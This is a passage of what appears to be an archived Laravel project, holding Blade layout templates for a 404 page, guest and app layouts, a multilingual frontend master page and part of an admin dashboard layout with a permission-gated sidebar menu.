rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar"> <section class="error-404-wrapper section-padding mt-50"> <div class="container"> <div class="row"> <div class="col-lg-6 offset-lg-3 text-center"> <div class="error-content"> <img src="{{ asset('uploads/img/dummy/404.png') }}" alt="404 image"> <h1 class="mt-5 mb-3">Oops! Page not found.</h1> <p>Sorry, an error has occured, Requested page not found!</p> <a href="{{ url('/') }}" class="btn btn-primary btn-lg mt-50">Back To Homepage</a> </div> <div class="leaf"><img src="{{ asset('uploads/img/dummy/leaf.png') }}" alt="leaf image"></div> <div class="leaf-copy"><img src="{{ asset('uploads/img/dummy/leaf.png') }}" alt="leaf image"></div> </div> </div> </div> </section> </body> </html> ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/layouts/guest.blade.php�����������������������������������������������������������������������0000644�����������������00000001351�14765366573�0012335 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html lang="{{ str_replace('_', '-', app()->getLocale()) }}"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-token" content="{{ csrf_token() }}"> <title>{{ config('app.name', 'Laravel') }}</title> <!-- Fonts --> <link rel="preconnect" href="https://fonts.bunny.net"> <link href="https://fonts.bunny.net/css?family=figtree:400,500,600&display=swap" rel="stylesheet" /> <!-- Scripts --> @vite(['resources/css/app.css', 'resources/js/app.js']) </head> <body> <div class="font-sans text-gray-900 antialiased"> {{ $slot }} </div> </body> </html> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/layouts/app.blade.php�������������������������������������������������������������������������0000644�����������������00000002437�14765366573�0011774 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html lang="{{ str_replace('_', '-', app()->getLocale()) }}"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-token" content="{{ csrf_token() }}"> <title>{{ config('app.name', 'Laravel') }}</title> <!-- Fonts --> <link rel="preconnect" href="https://fonts.bunny.net"> <link href="https://fonts.bunny.net/css?family=figtree:400,500,600&display=swap" rel="stylesheet" /> <!-- Scripts --> @vite(['resources/css/app.css', 'resources/js/app.js']) <!-- Styles --> @livewireStyles </head> <body class="font-sans antialiased"> <x-banner /> <div class="min-h-screen bg-gray-100"> @livewire('navigation-menu') <!-- Page Heading --> @if (isset($header)) <header class="bg-white shadow"> <div class="max-w-7xl mx-auto py-6 px-4 sm:px-6 lg:px-8"> {{ $header }} </div> </header> @endif <!-- Page Content --> <main> {{ $slot }} </main> </div> @stack('modals') @livewireScripts </body> </html> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/layouts/frontend/master.blade.php�������������������������������������������������������������0000644�����������������00000013555�14765366573�0014331 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (isset($seo)){{ $seo->site_name }} @endif"> <meta name="description" content="@if (isset($service)) {{ $service->meta_description }} @elseif (isset($blog)) {{ $blog->meta_description }} @elseif (isset($seo)) {{ $seo->site_description }} @endif"> <meta name="keywords" content="@if (isset($service)) {{ $service->meta_keyword }} @elseif (isset($blog)) {{ $software->meta_keyword }} @elseif (isset($seo)) {{ $seo->site_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (isset($seo)){{ $seo->site_name }} @endif"> <meta property="og:url" content="@if (isset($seo)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (isset($seo)){{ $seo->site_description }} @endif"> <meta property="og:image" content="@if (!empty($site_image->favicon_image)){{ asset('uploads/img/general/'.$site_image->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($site_image->favicon_image)){{ asset('uploads/img/general/'.$site_image->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($site_image->favicon_image)){{ asset('uploads/img/general/'.$site_image->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (isset($seo)){{ $seo->site_name }} @endif"> <meta property="twitter:description" content="@if (isset($seo)){{ $seo->site_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>{{ __('frontend.home') }} @if (isset($seo)) - {{ $seo->site_name }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <!-- =========== All Stylesheet ================= --> <!-- Icon css plugins --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/icons.css') }}"> <!-- animate css plugins --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/animate.css') }}"> <!-- slick css plugins --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/slick.css') }}"> <!-- magnific-popup css plugins --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/magnific-popup.css') }}"> <!-- metis menu css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/metismenu.css') }}"> <!-- Bootstrap css plugins --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/bootstrap.min.css') }}"> <!-- main style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> .faq-video-wrapper::after { background-image: url({{ asset('uploads/img/dummy/icons/top-lines.png') }}); } </style> @if (isset($google_analytic)) <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif </head> <body class="body-wrapper"> @include('frontend.sections.preloader.preloader') @include('frontend.sections.header.header-style1') @yield('content') @include('frontend.sections.footer.footer-style1') <!-- ALl JS Plugins ====================================== --> <script src="{{ asset('assets/frontend/js/jquery.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/modernizr.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/jquery.easing.js') }}"></script> <script src="{{ asset('assets/frontend/js/popper.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/bootstrap.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/isotope.pkgd.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/imageload.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/scrollUp.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/slick.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/magnific-popup.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/wow.min.js') }}"></script> <script src="{{ asset('assets/frontend/js/metismenu.js') }}"></script> <script src="{{ asset('assets/frontend/js/active.js') }}"></script> </body> </html> ���������������������������������������������������������������������������������������������������������������������������������������������������views/layouts/admin/master.blade.php����������������������������������������������������������������0000644�����������������00000233063�14765366573�0013600 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <meta charset="UTF-8"> <meta name="robots" content="noindex, nofollow"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- Required meta tags --> <meta name="csrf-token" content="{{ csrf_token() }}"> <title>{{ config('app.name', 'Laravel') }}</title> <!-- Favicon --> @isset($favicon) @if (!empty($favicon->favicon_image)) <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @endif @else <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endisset <!-- Fonts --> <link href="{{ asset('assets/admin/side_menu/vendor/fontawesome-free/css/all.min.css') }}" rel="stylesheet"> <link href="{{ asset('assets/admin/side_menu/vendor/fontawesome-free/css/fontawesome-iconpicker.min.css') }}" rel="stylesheet"> <!-- Datepicker CSS --> <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/css/bootstrap-datepicker.min.css') }}"> <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/css/default-assets/color-picker-bootstrap.css') }}"> <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/css/default-assets/form-picker.css') }}"> <!-- Tags Input CSS --> <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/css/default-assets/jquery.tagsinput.min.css') }}"> <!-- Master Stylesheet CSS --> @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/version_rtl/style.css') }}"> @endif @if(session()->get('language_direction_from_dropdown') == 0) <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/style.css') }}"> @endif @elseif (isset($language)) @if ($language->direction == 0) <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/style.css') }}"> @else <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/version_rtl/style.css') }}"> @endif @endif <!-- Light box CSS --> <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/css/default-assets/new/ekko-lightbox.min.css') }}"> <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/css/default-assets/new/lightbox.min.css') }}"> <!-- Data tables CSS --> <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/css/default-assets/datatables.bootstrap4.css') }}"> <link rel="stylesheet" href="{{ asset('assets/admin/side_menu/css/default-assets/responsive.bootstrap4.css') }}"> <!-- Summer note Css --> <link href="{{ asset('assets/admin/side_menu/css/summernote-bs4.min.css') }}" rel="stylesheet"> <!-- Draggable Css --> <link href="{{ asset('assets/admin/side_menu/css/draggable.css') }}" rel="stylesheet"> </head> <body @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-version" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-version" @endif @endif > <!-- ====================================== ******* Main Page Wrapper ********** ======================================= --> <div class="main-container-wrapper"> <!-- Top bar area --> <nav class="navbar col-lg-12 col-12 p-0 fixed-top d-flex flex-row"> <div class="text-center navbar-brand-wrapper d-flex align-items-center justify-content-center"> @isset($panel_image) @if (!empty($panel_image->section_image)) <a class="navbar-brand brand-logo mr-5" href="{{ url('dashboard') }}"> <img src="{{ asset('uploads/img/general/'.$panel_image->section_image) }}" class="mr-2" alt="logo" /> </a> @endif @if (!empty($panel_image->section_image_2)) <a class="navbar-brand brand-logo-mini" href="{{ url('dashboard') }}"> <img src="{{ asset('uploads/img/general/'.$panel_image->section_image_2) }}" alt="logo" /> </a> @endif @else <a class="navbar-brand brand-logo mr-5" href="#"> <img src="{{ asset('uploads/img/dummy/328x96.jpg') }}" class="mr-2" alt="logo" /> </a> <a class="navbar-brand brand-logo-mini" href="#"> <img src="{{ asset('uploads/img/dummy/112x96.jpg') }}" alt="logo" /> </a> @endisset </div> <div class="navbar-menu-wrapper d-flex align-items-center justify-content-between"> <button class="navbar-toggler navbar-toggler align-self-center" type="button" data-toggle="minimize"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-menu"> <line x1="3" y1="12" x2="21" y2="12"></line> <line x1="3" y1="6" x2="21" y2="6"></line> <line x1="3" y1="18" x2="21" y2="18"></line> </svg> </button> <ul class="navbar-nav mr-lg-2"> <li class="nav-item d-none d-md-block"> <span class="badge badge-primary"> {{ __('content.data_language') }}: {{ $data_language->language_name }} <i class="fas fa-hand-point-right ml-1"></i> </span> </li> <li class="nav-item dropdown dropdown-animate"> <a href="#" class="count-indicator" data-toggle="modal" data-target="#processedLanguageModal"> <i class="fas fa-globe-europe"></i> </a> </li> </ul> <ul class="top-navbar-area navbar-nav navbar-nav-right"> <li class="nav-item dropdown dropdown-animate"> <a href="{{ url('/') }}" class="badge badge-primary d-none d-md-block"> {{ __('content.site') }} </a> </li> @if (count($display_dropdowns) > 0) <li class="nav-item dropdown dropdown-animate"> <a class="nav-link count-indicator dropdown-toggle" id="notificationDropdown" href="#" data-toggle="dropdown"> @if (session()->has('language_name_from_dropdown')) {{ session()->get('language_name_from_dropdown') }} @else {{ $language->language_name }} @endif<i class="arrow_carrot-down"></i> </a> <div class="dropdown-menu dropdown-menu-right navbar-dropdown preview-list" aria-labelledby="notificationDropdown"> <p class="mb-0 font-weight-normal float-left dropdown-header">{{ __('content.languages') }}</p> @foreach ($display_dropdowns as $display_dropdown) <a href="{{ url('language/set-locale/'.$display_dropdown->id) }}" class="dropdown-item preview-item d-flex align-items-center">{{ $display_dropdown->language_name }}</a> @endforeach </div> </li> @endif <li class="nav-item dropdown dropdown-animate"> <a class="nav-link count-indicator dropdown-toggle" id="notificationDropdown" href="#" data-toggle="dropdown"> <i class="far fa-bell"></i> @if (count($general_unread_message_count) > 0) <span class="count"></span> @endif </a> <div class="dropdown-menu dropdown-menu-right navbar-dropdown preview-list" aria-labelledby="notificationDropdown"> <p class="mb-0 font-weight-normal float-left dropdown-header">{{ __('content.notifications') }}</p> @can('contact message check') <a href="{{ url('admin/contact-message') }}" class="dropdown-item preview-item d-flex align-items-center"> <div class="notification-thumbnail"> <div class="preview-icon bg-primary"> <i class="ti-info-alt mx-0"></i> </div> </div> <div class="notification-item-content"> <h6>{{ __('content.messages') }}</h6> <p class="mb-0"> {{ count($general_unread_message_count) }} </p> </div> </a> @endcan </div> </li> <li class="nav-item nav-profile dropdown dropdown-animate"> <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" id="profileDropdown"> @if(Auth::user()->profile_photo_path != null) <img src="{{ asset('uploads/img/profile/'.Auth::user()->profile_photo_path) }}" class="img-profile rounded-circle" alt="profile image"> @else <img src="{{ asset('uploads/img/dummy/128x128.jpg') }}" class="img-profile rounded-circle" alt="profile image"> @endif </a> <div class="dropdown-menu dropdown-menu-right navbar-dropdown profile-top" aria-labelledby="profileDropdown"> <a href="{{ url('admin/profile/edit') }}" class="dropdown-item"><i class="fas fa-user profile-icon" aria-hidden="true"></i> {{ __('content.profile') }}</a> <a href="{{ url('admin/profile/change-password') }}" class="dropdown-item"><i class="fas fa-unlock-alt profile-icon" aria-hidden="true"></i> {{ __('content.change_password') }}</a> <!-- Authentication --> <a class="dropdown-item" href="{{ route('logout') }}" onclick="event.preventDefault(); document.getElementById('logout-form').submit();"> <i class="fas fa-link profile-icon" aria-hidden="true"></i> {{ __('content.logout') }} </a> <form id="logout-form" action="{{ route('logout') }}" method="POST" style="display: none;"> @csrf </form> </div> </li> </ul> <button class="navbar-toggler navbar-toggler-right d-xl-none align-self-center" type="button" data-toggle="offcanvas"> <span class="ti-layout-grid2"></span> </button> </div> </nav> <div class="container-fluid page-body-wrapper"> <!-- Side Menu area --> <nav class="sidebar sidebar-offcanvas" id="sidebar"> <ul class="nav"> <li class="nav-item {{ (request()->is('dashboard')) ? 'active' : '' }}"> <a class="nav-link" href="{{ url('admin/dashboard') }}"> <i class="fas fa-th-large menu-icon"></i> <span class="menu-title">{{ __('content.dashboard') }}</span> </a> </li> @can('page builder check') <li class="nav-item {{ (request()->is('admin/page-name/create') || request()->is('admin/page-name/*/edit') || request()->is('admin/page-builder/create') || request()->is('admin/page-builder/*/edit') ) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#page_builders" aria-expanded="false" aria-controls="page_builders"> <i class="fa fa-home menu-icon"></i> <span class="menu-title">{{ __('content.page_builder') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/page-name/create') || request()->is('admin/page-name/*/edit') || request()->is('admin/page-builder/create') || request()->is('admin/page-builder/*/edit')) ? 'show' : '' }}" id="page_builders"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/page-name/create') || request()->is('admin/page-name/*/edit')) ? 'active' : '' }}" href="{{ url('admin/page-name/create') }}">{{ __('content.page_names') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/page-builder/create') || request()->is('admin/page-builder/*/edit')) ? 'active' : '' }}" href="{{ url('admin/page-builder/create') }}">{{ __('content.pages') }}</a></li> </ul> </div> </li> @endcan @can('menu check') <li class="nav-item {{ (request()->is('admin/menu/create') || request()->is('admin/menu/*/edit') || request()->is('admin/submenu/create') || request()->is('admin/submenu/*/edit') ) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#menus" aria-expanded="false" aria-controls="menus"> <i class="fa fa-bars menu-icon"></i> <span class="menu-title">{{ __('content.menus') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/menu/create') || request()->is('admin/menu/*/edit') || request()->is('admin/submenu/create') || request()->is('admin/submenu/*/edit')) ? 'show' : '' }}" id="menus"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/menu/create') || request()->is('admin/menu/*/edit')) ? 'active' : '' }}" href="{{ url('admin/menu/create') }}">{{ __('content.menu') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/submenu/create') || request()->is('admin/submenu/*/edit')) ? 'active' : '' }}" href="{{ url('admin/submenu/create') }}">{{ __('content.submenu') }}</a></li> </ul> </div> </li> @endcan @can('upload check') <li class="nav-item {{ (request()->is('admin/photo/create') || request()->is('admin/photo/*/edit')) ? 'active' : '' }}"> <a class="nav-link" href="{{ url('admin/photo/create') }}"> <i class="fas fa-cloud-upload-alt menu-icon"></i> <span class="menu-title">{{ __('content.uploads') }}</span> </a> </li> @endcan @can('blog check') <li class="nav-item {{ (request()->is('admin/blog') || request()->is('admin/blog/create') || request()->is('admin/blog/*/edit') || request()->is('admin/category/create') || request()->is('admin/category/*/edit') || request()->is('admin/blog-image/*/create') || request()->is('admin/blog-image/*/*/edit') || request()->is('admin/blog-detail/*/create') || request()->is('admin/blog-detail/*/*/edit')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#blogs" aria-expanded="false" aria-controls="blogs"> <i class="fab fa-blogger-b menu-icon"></i> <span class="menu-title">{{ __('content.blogs') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/blog') || request()->is('admin/blog/create') || request()->is('admin/blog/*/edit') || request()->is('admin/category/create') || request()->is('admin/category/*/edit') || request()->is('admin/blog-image/*/create') || request()->is('admin/blog-image/*/*/edit') || request()->is('admin/blog-detail/*/create') || request()->is('admin/blog-detail/*/*/edit')) ? 'show' : '' }}" id="blogs"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/category/create') || request()->is('admin/category/*/edit')) ? 'active' : '' }}" href="{{ url('admin/category/create') }}">{{ __('content.categories') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/blog/create')) ? 'active' : '' }}" href="{{ url('admin/blog/create') }}">{{ __('content.add_blog') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/blog') || request()->is('admin/blog/*/edit') || request()->is('admin/blog-image/*/create') || request()->is('admin/blog-image/*/*/edit') || request()->is('admin/blog-detail/*/create') || request()->is('admin/blog-detail/*/*/edit')) ? 'active' : '' }}" href="{{ url('admin/blog') }}">{{ __('content.blogs') }}</a></li> </ul> </div> </li> @endcan @can('section check') <li class="nav-item {{ ( request()->is('admin/banner/create/*') || request()->is('admin/banner/create') || request()->is('admin/about/create/*') || request()->is('admin/about/create') || request()->is('admin/about-feature/*/edit') || request()->is('admin/feature/create/*') || request()->is('admin/feature/create') || request()->is('admin/feature/*/edit') || request()->is('admin/counter/create/*') || request()->is('admin/counter/create') || request()->is('admin/counter/*/edit') || request()->is('admin/work-process/create/*') || request()->is('admin/work-process/create') || request()->is('admin/work-process/*/edit') || request()->is('admin/history/create/*') || request()->is('admin/history/create') || request()->is('admin/history/*/edit') || request()->is('admin/why-choose/create/*') || request()->is('admin/why-choose/create') || request()->is('admin/why-choose/*/edit') || request()->is('admin/testimonial/create/*') || request()->is('admin/testimonial/create') || request()->is('admin/testimonial/*/edit') || request()->is('admin/contact-info/create/*') || request()->is('admin/contact-info/create') || request()->is('admin/map/create/*') || request()->is('admin/map/create') || request()->is('admin/sponsor/create/*') || request()->is('admin/sponsor/create') || request()->is('admin/sponsor/*/edit') || request()->is('admin/video/create/*') || request()->is('admin/video/create') || request()->is('admin/faq/create/*') || request()->is('admin/faq/create') || request()->is('admin/faq/*/edit') || request()->is('admin/call-to-action/create/*') || request()->is('admin/call-to-action/create') || request()->is('admin/footer') || request()->is('admin/footer/create') || request()->is('admin/footer/*/edit') || request()->is('admin/footer-category/create') || request()->is('admin/footer-category/*/edit') || request()->is('admin/plan/create') || request()->is('admin/plan/*/edit') || request()->is('admin/subscribe-section/create/*') || request()->is('admin/subscribe-section/create')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#advanced" aria-expanded="false" aria-controls="advanced"> <i class="fas fa-puzzle-piece menu-icon"></i> <span class="menu-title">{{ __('content.sections') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ ( request()->is('admin/banner/create/*') || request()->is('admin/banner/create') || request()->is('admin/about/create/*') || request()->is('admin/about/create') || request()->is('admin/about-feature/*/edit') || request()->is('admin/feature/create/*') || request()->is('admin/feature/create') || request()->is('admin/feature/*/edit') || request()->is('admin/counter/create/*') || request()->is('admin/counter/create') || request()->is('admin/counter/*/edit') || request()->is('admin/work-process/create/*') || request()->is('admin/work-process/create') || request()->is('admin/work-process/*/edit') || request()->is('admin/history/create/*') || request()->is('admin/history/create') || request()->is('admin/history/*/edit') || request()->is('admin/why-choose/create/*') || request()->is('admin/why-choose/create') || request()->is('admin/why-choose/*/edit') || request()->is('admin/testimonial/create/*') || request()->is('admin/testimonial/create') || request()->is('admin/testimonial/*/edit') || request()->is('admin/contact-info/create/*') || request()->is('admin/contact-info/create') || request()->is('admin/map/create/*') || request()->is('admin/map/create') || request()->is('admin/sponsor/create/*') || request()->is('admin/sponsor/create') || request()->is('admin/sponsor/*/edit') || request()->is('admin/video/create/*') || request()->is('admin/video/create') || request()->is('admin/faq/create/*') || request()->is('admin/faq/create') || request()->is('admin/faq/*/edit') || request()->is('admin/call-to-action/create/*') || request()->is('admin/call-to-action/create') || request()->is('admin/footer') || request()->is('admin/footer/create') || request()->is('admin/footer/*/edit') || request()->is('admin/footer-category/create') || request()->is('admin/footer-category/*/edit') || request()->is('admin/plan/create') || request()->is('admin/plan/*/edit') || request()->is('admin/subscribe-section/create/*') || request()->is('admin/subscribe-section/create')) ? 'show' : '' }}" id="advanced"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/banner/create/*') || request()->is('admin/banner/create')) ? 'active' : '' }}" href="{{ url('admin/banner/create') }}">{{ __('content.banner') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/about/create/*') || request()->is('admin/about/create') || request()->is('admin/about-feature/*/edit')) ? 'active' : '' }}" href="{{ url('admin/about/create') }}">{{ __('content.about') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/history/create/*') || request()->is('admin/history/create') || request()->is('admin/history/*/edit')) ? 'active' : '' }}" href="{{ url('admin/history/create') }}">{{ __('content.history') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/feature/create/*') || request()->is('admin/feature/create') || request()->is('admin/feature/*/edit')) ? 'active' : '' }}" href="{{ url('admin/feature/create') }}">{{ __('content.features') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/counter/create/*') || request()->is('admin/counter/create') || request()->is('admin/counter/*/edit')) ? 'active' : '' }}" href="{{ url('admin/counter/create') }}">{{ __('content.counters') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/work-process/create/*') || request()->is('admin/work-process/create') || request()->is('admin/work-process/*/edit')) ? 'active' : '' }}" href="{{ url('admin/work-process/create') }}">{{ __('content.work_process') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/why-choose/create/*') || request()->is('admin/why-choose/create') || request()->is('admin/why-choose/*/edit')) ? 'active' : '' }}" href="{{ url('admin/why-choose/create') }}">{{ __('content.why_choose') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/call-to-action/create/*') || request()->is('admin/call-to-action/create')) ? 'active' : '' }}" href="{{ url('admin/call-to-action/create') }}">{{ __('content.call_to_action') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/testimonial/create/*') || request()->is('admin/testimonial/create') || request()->is('admin/testimonial/*/edit')) ? 'active' : '' }}" href="{{ url('admin/testimonial/create') }}">{{ __('content.testimonials') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/sponsor/create/*') || request()->is('admin/sponsor/create') || request()->is('admin/sponsor/*/edit')) ? 'active' : '' }}" href="{{ url('admin/sponsor/create') }}">{{ __('content.sponsors') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/video/create/*') || request()->is('admin/video/create')) ? 'active' : '' }}" href="{{ url('admin/video/create') }}">{{ __('content.video') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/faq/create/*') || request()->is('admin/faq/create') || request()->is('admin/faq/*/edit')) ? 'active' : '' }}" href="{{ url('admin/faq/create') }}">{{ __('content.faqs') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/plan/create') || request()->is('admin/plan/*/edit')) ? 'active' : '' }}" href="{{ url('admin/plan/create') }}">{{ __('content.plan') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/subscribe-section/create/*') || request()->is('admin/subscribe-section/create')) ? 'active' : '' }}" href="{{ url('admin/subscribe-section/create') }}">{{ __('content.subscribe') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/contact-info/create/*') || request()->is('admin/contact-info/create')) ? 'active' : '' }}" href="{{ url('admin/contact-info/create') }}">{{ __('content.contact_info') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/map/create/*') || request()->is('admin/map/create')) ? 'active' : '' }}" href="{{ url('admin/map/create') }}">{{ __('content.map') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/footer/create') || request()->is('admin/footer/*/edit') || request()->is('admin/footer') || request()->is('admin/footer-category/create') || request()->is('admin/footer-category/*/edit')) ? 'active' : '' }}" href="{{ url('admin/footer') }}">{{ __('content.footer') }}</a></li> </ul> </div> </li> @endcan @can('service check') <li class="nav-item {{ (request()->is('admin/service/style1') || request()->is('admin/service-content/*/create') || request()->is('admin/service-info/*/create') || request()->is('admin/service/create/*') || request()->is('admin/service/*/edit') || request()->is('admin/service-category/create') || request()->is('admin/service-category/*/edit') || request()->is('admin/service-feature/*/create') || request()->is('admin/service-feature/*/*/edit')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#services" aria-expanded="false" aria-controls="services"> <i class="fas fa-plus-square menu-icon"></i> <span class="menu-title">{{ __('content.services') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/service/style1') || request()->is('admin/service-content/*/create') || request()->is('admin/service-info/*/create') || request()->is('admin/service/create/*') || 